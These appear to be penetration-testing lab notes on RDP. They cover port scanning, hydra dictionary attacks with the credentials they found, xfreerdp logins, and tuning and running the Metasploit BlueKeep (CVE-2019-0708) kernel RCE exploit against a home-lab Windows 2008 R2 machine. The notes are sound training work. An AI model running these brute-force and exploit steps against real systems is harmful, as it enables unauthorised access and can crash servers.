Skip to content

Latest commit

 

History

History
258 lines (178 loc) · 7.39 KB

rdp.md

File metadata and controls

258 lines (178 loc) · 7.39 KB
Raw

🔬RDP

Lab 1

🔬 Windows: Insecure RDP Service

  • Target IP: 10.4.18.131
  • RDP exploitation
  • Dictionaries to use:
    • /usr/share/metasploit-framework/data/wordlists/common_users.txt
    • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Enumeration

ping 10.4.18.131

nmap -sV 10.4.18.131
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3333/tcp  open  ssl/dec-notes?
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

  • Use Metasploit rdp_scanner module to check if port 3333 is running RDP.
msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS 10.4.18.131
set RPORT 3333
run

Metasploit rdp_scanner

📌 The RDP is exposed on target port 3333, and not on the default port 3389.

RDP Brute-force

  • Try hydra to find valid username and password
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.4.18.131 -s 3333
[3333][rdp] host: 10.4.18.131   login: sysadmin   password: samantha
[3333][rdp] host: 10.4.18.131   login: demo   password: victoria
[3333][rdp] host: 10.4.18.131   login: auditor   password: elizabeth
[3333][rdp] host: 10.4.18.131   login: administrator   password: qwertyuiop

hydra

  • freerdp cannot be used in this lab
  • Use xfreerdp to connect to target via RDP
xfreerdp /u:administrator /p:qwertyuiop /v:10.4.18.131:3333

xfreerdp RDP connected

Reveal Flag: 🚩

port-number-3333

Lab 2 - BlueKeep (Extra)

🔬 Home Lab

I have prepared a vulnerable Windows 2008 R2 Virtual Machine and connected it to the same network of the Kali virtual machine. On the server, I have activated RDP service on default port 3389.

  • Host system: Kali Linux
  • Target system: Windown Server 2008 R2 - IP 192.168.31.131 - Administrator:Eternal17010
  • Exploitation tool:
  • Vulnerability: CVE-2019-0708 - BlueKeep
  • Targeting Kernel space memory and apps can cause system crashes.
  • The attacker can remotely execute arbitrary code by gaining access to a chunk of kernel memory, without authentication.
  • BlueKeep PoC's (Proof of Concepts) and exploits could be malicious in nature, use only verified exploit code and modules.

Metasploit BlueKeep modules

  • Target RDP activated:

Enumeration

nmap -sV -sC 192.168.31.131

nmap -sV -sC 192.168.31.131

  • 📌 RDP Port 3389 is open

Exploitation

msfconsole
search bluekeep
use 0 # Module auxiliary/scanner/rdp/cve_2019_0708_bluekeep ID
set RHOSTS 192.168.31.131
exploit

Metasploit cve_2019_0708_bluekeep

search bluekeep
use 1 # Module exploit/windows/rdp/cve_2019_0708_bluekeep_rce ID
set RHOSTS 192.168.31.131
show targets
set target 5
exploit

Metasploit cve_2019_0708_bluekeep_rce

Win Server 2008 R2 crash

Kernel CRASH can be caused by this exploit, so pay attention on production environment

Adjusting the exploit

Finding the NPP

  • To make the exploit work, it needs the correct GROOMBASE value which is the start address of the Non Paged Pool area (NPP).
  • The NPP address can be extracted from a memory dump of the target machine.
  • In VMWare, take a snapshot of the target virtual machine (Win Server 2008 R2).
    • Download the vmss2core tool
    • From the VM (virtual machine) folder copy the .vmem and .vmsn files to the vmss2core tool folder
    • Run the tool to generate a memory.dmp file
.\vmss2core-sb-8456865.exe -W "WinSrv_2008_R2_x64-Snapshot1.vmsn" "WinSrv_2008_R2_x64-Snapshot1.vmem"
  • Run WinDbg and open the memory.dmp file
    • Run !polfind a to get a message
    • That is the start of address of Non Page Pool, in this case fffffa8018c08000

WinDbg

  • Edit the exploit and set the GROOMBASE variable if not already set.
    • In my case it is already set as the above address, for the 2008 R2 (6.1.7601 x64 - VMWare 15.1) target number 5.

  • Save the exploit file and run reload_all in the Metasploit interface.
  • Set the GROOMSIZE to 50.
msfconsole
search bluekeep
use 1 # Module exploit/windows/rdp/cve_2019_0708_bluekeep_rce ID
set RHOSTS 192.168.31.131
show targets
set target 5
set GROOMSIZE 50
exploit

BlueKeep RCE Success

Lab 3 (Extra)

Windows RDP: Dictionary Attack

  • Target IP: 10.4.22.41
  • RDP exploitation
  • Dictionaries to use:
    • /usr/share/metasploit-framework/data/wordlists/common_users.txt
    • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
nmap 10.10.4.22.41

PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.4.22.41 -s 3389

xfreerdp /u:administrator /p:bubbles /v:10.4.22.41
# default port is 3389
Reveal Flag: 🚩

sysadmin-stephaie-123